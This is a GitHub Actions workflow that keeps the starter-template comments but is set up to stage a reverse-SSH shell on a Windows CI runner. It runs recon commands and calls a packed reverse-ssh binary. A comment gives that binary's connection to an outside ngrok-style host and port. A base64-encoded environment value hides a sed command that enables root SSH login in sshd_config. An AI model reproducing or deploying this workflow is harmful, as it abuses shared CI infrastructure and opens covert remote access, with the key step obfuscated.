# This is a basic workflow to help you get started with Actions

name: FG_2023_0120

# Controls when the workflow will run
on:
    # Triggers the workflow on push or pull request events but only for the main branch
  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:
    inputs:
      name77:
        description: 'PersonDesc'
        required: true
        default: 'AABBCC_rev_shell'

    
# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build_jobs3:
    # The type of runner that the job will run on
    runs-on: "windows-2019"
    

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, choco install busybox ;
      # upx_reverse-sshx64.exe  -v -p  34292  ngrok.xiaomiqiu123.top 
      - uses: actions/checkout@v2


      - name: Run a one-line script
        run:  "whoami;id; (type env:path) -split ';'  "
        env:
          ss0: "c2VkIC1pICJzL14jXD9cKFBlcm1pdFJvb3RMb2dpblwpL1wxIHllcyMvZyIgL2V0Yy9zc2gvc3NoZF9jb25maWc7"
      # choco -V&&busybox&&busybox pwd&&dir  ../../../ &&    \"C:/Program Files/Git/bin/"
      - name: Run a 2-line script
        run:  "ls &&which id sh bash ps curl git regedit mmc which su sudo ;echo $GITHUB_WORKSPACE; upx_reverse-sshx64.exe -V; "
        env:
          ss0: "c2VkIC1pICJzL14jXD9cKFBlcm1pdFJvb3RMb2dpblwpL1wxIHllcyMvZyIgL2V0Yy9zc2gvc3NoZF9jb25maWc7" 
